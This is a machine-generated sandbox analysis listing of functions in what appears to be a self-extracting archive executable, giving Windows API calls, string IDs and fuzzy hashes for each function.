                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                        • Opcode ID: 6cac00eba924a1d7285ccd0f67a8b9bcadb0ce86a4cc92a4f8de42a4cd9c79a7
                                                                                                                                        • Instruction ID: fcc3349f99041e7108e1f03fe2b7f9ea5e63cc7f2162899662b02e4593727937
                                                                                                                                        • Opcode Fuzzy Hash: 6cac00eba924a1d7285ccd0f67a8b9bcadb0ce86a4cc92a4f8de42a4cd9c79a7
                                                                                                                                        • Instruction Fuzzy Hash: 6551BF7261421AABEB398E68CC85FFF77A9EF84750F154629FC05D6140EB38EC50D6A0
                                                                                                                                        Function 007A9036 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0079F324
                                                                                                                                          • Part of subcall function 0079F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0079DEC8,Crypt32.dll,?,0079DF4A,?,0079DF2E,?,?,?,?), ref: 0079F346
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 007A904F
                                                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007A9086
                                                                                                                                        • SHGetMalloc.SHELL32(007D20E8), ref: 007A9090
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                        • String ID: riched20.dll$3Ro
                                                                                                                                        • API String ID: 3498096277-3613677438
                                                                                                                                        • Opcode ID: 9863693e927bd2f3ac9b65863de25529bc28058be9427cefc8448b61364f6c5c
                                                                                                                                        • Instruction ID: 5e0cf1fdfc4ad2f2f43cb48aed2723ec9470e8f2253973a3d602744455f7e54b
                                                                                                                                        • Opcode Fuzzy Hash: 9863693e927bd2f3ac9b65863de25529bc28058be9427cefc8448b61364f6c5c
                                                                                                                                        • Instruction Fuzzy Hash: 38F0FFB5D0010DBBCB10AF9AD8499EEFFFCEF95705F00816AE814E2211D7B85645CBA1
                                                                                                                                        Function 0079F9D1 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079FDC9: ResetEvent.KERNEL32(?,?,0079F9F3,014F6D78,?,007D1E74,00000000,007BF79B,000000FF,000001B8,0079FC8F,?,?,?,?,0079A5A0), ref: 0079FDE9
                                                                                                                                          • Part of subcall function 0079FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0079A5A0,?,?,?,?,007BF79B,000000FF), ref: 0079FDFD
                                                                                                                                        • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0079FA05
                                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 0079FA1F
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 0079FA38
                                                                                                                                        • CloseHandle.KERNELBASE(?), ref: 0079FA44
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0079FA50
                                                                                                                                          • Part of subcall function 0079FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0079FD0B,?,?,0079FD80,?,?,?,?,?,0079FD6A), ref: 0079FACD
                                                                                                                                          • Part of subcall function 0079FAC7: GetLastError.KERNEL32(?,?,0079FD80,?,?,?,?,?,0079FD6A), ref: 0079FAD9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1868215902-0
                                                                                                                                        • Opcode ID: 1c0f5fe3a39b6dcbbb56ebbea7d696e5d0f89bfeb9eef9803b33daab73a9d8fd
                                                                                                                                        • Instruction ID: bb01c4ee588bc4c5cd9113527456d4f50dd1defbd43f870c2046fa43eb88c3df
                                                                                                                                        • Opcode Fuzzy Hash: 1c0f5fe3a39b6dcbbb56ebbea7d696e5d0f89bfeb9eef9803b33daab73a9d8fd
                                                                                                                                        • Instruction Fuzzy Hash: 7A01B531100744EFCB319F28ED48F86BBEAFB46710F01852DF25E92560DB796840CBA1
                                                                                                                                        Function 007A8FC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 896 7a8fc8-7a8fe7 GetClassNameW 897 7a8fe9-7a8ffe call 7a0b12 896->897 898 7a900f-7a9011 896->898 903 7a900e 897->903 904 7a9000-7a900c FindWindowExW 897->904 900 7a901c-7a9020 898->900 901 7a9013-7a9016 SHAutoComplete 898->901 901->900 903->898 904->903
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(?,?,00000050), ref: 007A8FDF
                                                                                                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 007A9016
                                                                                                                                          • Part of subcall function 007A0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0079AC49,?,?,?,0079ABF8,?,-00000002,?,00000000,?), ref: 007A0B28
                                                                                                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 007A9006
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                        • String ID: EDIT
                                                                                                                                        • API String ID: 4243998846-3080729518
                                                                                                                                        • Opcode ID: 22352822fc77e2c2400050840c6137b99e1efefc0087c1a89f4f97a7c3d16024
                                                                                                                                        • Instruction ID: 886b7ae30ef928796f4efef5652c0cb3c81d29c2c2f79dcb3afc4b93443c3e31
                                                                                                                                        • Opcode Fuzzy Hash: 22352822fc77e2c2400050840c6137b99e1efefc0087c1a89f4f97a7c3d16024
                                                                                                                                        • Instruction Fuzzy Hash: 23F0E232A0032C77EB309A259C09F9F776CAB8BB51F044169BE00F2181D7689911C6FA
                                                                                                                                        Function 007ABE0A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 905 7abe0a-7abe35 call 7acec0 SetEnvironmentVariableW call 79ef07 909 7abe3a-7abe3e 905->909 910 7abe62-7abe66 909->910 911 7abe40-7abe44 909->911 912 7abe4d-7abe54 call 79effe 911->912 915 7abe46-7abe4c 912->915 916 7abe56-7abe5c SetEnvironmentVariableW 912->916 915->912 916->910
                                                                                                                                        APIs
                                                                                                                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ABE20
                                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ABE5C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                                        • String ID: sfxcmd$sfxpar
                                                                                                                                        • API String ID: 1431749950-3493335439
                                                                                                                                        • Opcode ID: 03b77092e4e69749a8052a4f495762b7f77e0382143df2037f23df9371e56531
                                                                                                                                        • Instruction ID: 85116b14fcb7513c0df2d598cfc883e9202a380e279bc6584f367a060c24312d
                                                                                                                                        • Opcode Fuzzy Hash: 03b77092e4e69749a8052a4f495762b7f77e0382143df2037f23df9371e56531
                                                                                                                                        • Instruction Fuzzy Hash: 9BF0A772805224E7CB216FD49C0DEEA77999F09B51F04415AFD8496142D76D4C40C6E1
                                                                                                                                        Function 0079973D Relevance: 6.1, APIs: 4, Instructions: 99fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 917 79973d-79975e call 7acec0 920 799760-799765 917->920 921 799767 917->921 920->921 922 799769-799786 920->922 921->922 923 799788 922->923 924 79978e-799798 922->924 923->924 925 79979a 924->925 926 79979d-7997c8 CreateFileW 924->926 925->926 927 7997ca-7997ec GetLastError call 79b275 926->927 928 79982c-799841 926->928 934 79981b-799820 927->934 935 7997ee-799810 CreateFileW GetLastError 927->935 929 79985b-799866 928->929 930 799843-799856 call 79f10e 928->930 930->929 934->928 936 799822 934->936 937 799812 935->937 938 799816-799819 935->938 936->928 937->938 938->928 938->934
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0079777A,?,00000005,?,00000011), ref: 007997BD
                                                                                                                                        • GetLastError.KERNEL32(?,?,0079777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007997CA
                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0079777A,?,00000005,?), ref: 007997FF
                                                                                                                                        • GetLastError.KERNEL32(?,?,0079777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00799807
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1214770103-0
                                                                                                                                        • Opcode ID: 4270d8c479c54949404d5e9f88e4af4b0f453128589fa120cd058319324d0ee1
                                                                                                                                        • Instruction ID: b65fe4e20558189daa0b8b4b01a3f780e88095d15d8bc4b5c32b5518a765746e
                                                                                                                                        • Opcode Fuzzy Hash: 4270d8c479c54949404d5e9f88e4af4b0f453128589fa120cd058319324d0ee1
                                                                                                                                        • Instruction Fuzzy Hash: 2B314570840745AFEB209B78AC49FEABBA8FB45314F10462DFA90832D1D779988887D0
                                                                                                                                        Function 00799613 Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00799623
                                                                                                                                        • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0079963B
                                                                                                                                        • GetLastError.KERNEL32 ref: 0079966D
                                                                                                                                        • GetLastError.KERNEL32 ref: 0079968C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2244327787-0
                                                                                                                                        • Opcode ID: e3bd6ff8868e38e816c8e41af43616e2ee22b27d5ebfadfde74ab58a77ef362c
                                                                                                                                        • Instruction ID: 27742b8a591bf7e0ba839d7b59d131a157415d98d46aedcae66a3b52312d8fcb
                                                                                                                                        • Opcode Fuzzy Hash: e3bd6ff8868e38e816c8e41af43616e2ee22b27d5ebfadfde74ab58a77ef362c
                                                                                                                                        • Instruction Fuzzy Hash: 08113934500604EBEF309F69E904A6A77ADEB05325F10C56EFA6A85290CB3EDD40DF96
                                                                                                                                        Function 007B77D1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007B2213,00000000,00000000,?,007B7778,007B2213,00000000,00000000,00000000,?,007B7975,00000006,FlsSetValue), ref: 007B7803
                                                                                                                                        • GetLastError.KERNEL32(?,007B7778,007B2213,00000000,00000000,00000000,?,007B7975,00000006,FlsSetValue,007C3768,007C3770,00000000,00000364,?,007B63F1), ref: 007B780F
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007B7778,007B2213,00000000,00000000,00000000,?,007B7975,00000006,FlsSetValue,007C3768,007C3770,00000000), ref: 007B781D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                        • Opcode ID: 8dfbf14a79e54b69f6de76ee9fe5be2144751229fa8d5b485b5bd5731e8bd79c
                                                                                                                                        • Instruction ID: 47405a9bce7f77c49f26851ef5722945c2a2b7e4d12874d1c0ae877a29dc81ef
                                                                                                                                        • Opcode Fuzzy Hash: 8dfbf14a79e54b69f6de76ee9fe5be2144751229fa8d5b485b5bd5731e8bd79c
                                                                                                                                        • Instruction Fuzzy Hash: C601F7327092269BC7254B689C4CF9A7B98AF847B1B114624F907D7140D728D900C6E4
                                                                                                                                        Function 007A991E Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007A992F
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007A9940
                                                                                                                                        • TranslateMessage.USER32(?), ref: 007A994A
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 007A9954
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4217535847-0
                                                                                                                                        • Opcode ID: 21153a161bd734a2a9bd029be54487784a6d97fe0e5e20fa730490459dae924e
                                                                                                                                        • Instruction ID: c8cc8169cf23d61259e7f5e33c1678516e957a3fe3aca7639b36b84a91e5be53
                                                                                                                                        • Opcode Fuzzy Hash: 21153a161bd734a2a9bd029be54487784a6d97fe0e5e20fa730490459dae924e
                                                                                                                                        • Instruction Fuzzy Hash: 8AE0EDB2C0212FB78B20AFE6AC4CCDFBF6CEE062AA700811AB519D2000D66CD505C7F5
                                                                                                                                        Function 0079FBB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0079FBD5
                                                                                                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 0079FC1C
                                                                                                                                          • Part of subcall function 00796DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00796DF1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                        • String ID: CreateThread failed
                                                                                                                                        • API String ID: 2655393344-3849766595
                                                                                                                                        • Opcode ID: 6be000e588ffa121c9f510e55dfbc241be1d9d237578a63b872a9b9a92c9ca34
                                                                                                                                        • Instruction ID: a6017ce824d2b59e45c89223b4a083b7440f1fa3cdb3fbb441bd71c54f3806f3
                                                                                                                                        • Opcode Fuzzy Hash: 6be000e588ffa121c9f510e55dfbc241be1d9d237578a63b872a9b9a92c9ca34
                                                                                                                                        • Instruction Fuzzy Hash: 2B01F9F1344309AFDB206FA8BC46FA67769EB45B11F10443EF946D2181CEE9AC4187B4
                                                                                                                                        Function 00799BC8 Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?,0079C853,00000001,?,?,?,00000000,007A420B,?,?,?,?,?,007A3CB0), ref: 00799BE3
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,007A3EB8,00000000,?,?,00000000,007A420B,?,?,?,?,?,007A3CB0,?), ref: 00799C23
                                                                                                                                        • WriteFile.KERNELBASE(?,00000000,?,007A3EB8,00000000,?,00000001,?,?,0079C853,00000001,?,?,?,00000000,007A420B), ref: 00799C50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite$Handle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4209713984-0
                                                                                                                                        • Opcode ID: 9b014d94c915d865e9d1eab8a013937095c7ca5c7333352e0914496094f8cb79
                                                                                                                                        • Instruction ID: 16c62e004f7dea0416b799188d70f082f13c5de4fd5a97cfd7c6f6931788fb4d
                                                                                                                                        • Opcode Fuzzy Hash: 9b014d94c915d865e9d1eab8a013937095c7ca5c7333352e0914496094f8cb79
                                                                                                                                        • Instruction Fuzzy Hash: D731D4B1148609AFEF209F68EC48F66BBA8EB52701F04451DE65597190C77DA888CBF1
                                                                                                                                        Function 00799E86 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 00799EAD
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 00799EE0
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 00799EFD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectory$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2485089472-0
                                                                                                                                        • Opcode ID: 6f6035c372237b7b42595b4989a49fe7844c5a018d56783b4c65afc23eaab0e5
                                                                                                                                        • Instruction ID: 78c9d5e4a699d36ebb3785a20833ef81b0d79a44c894bd0de88ceebd79ae8e9a
                                                                                                                                        • Opcode Fuzzy Hash: 6f6035c372237b7b42595b4989a49fe7844c5a018d56783b4c65afc23eaab0e5
                                                                                                                                        • Instruction Fuzzy Hash: 85019E32510118E6FF31EB6C7C8AFEA775DAF0A741F08045EFA45D6091EB6C89C096E6
                                                                                                                                        Function 00793AA3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID: CMT
                                                                                                                                        • API String ID: 3519838083-2756464174
                                                                                                                                        • Opcode ID: d07fcfc3f9a10f7baae7831d9b4d1ccb8e759646ec55111c94d908190c64984c
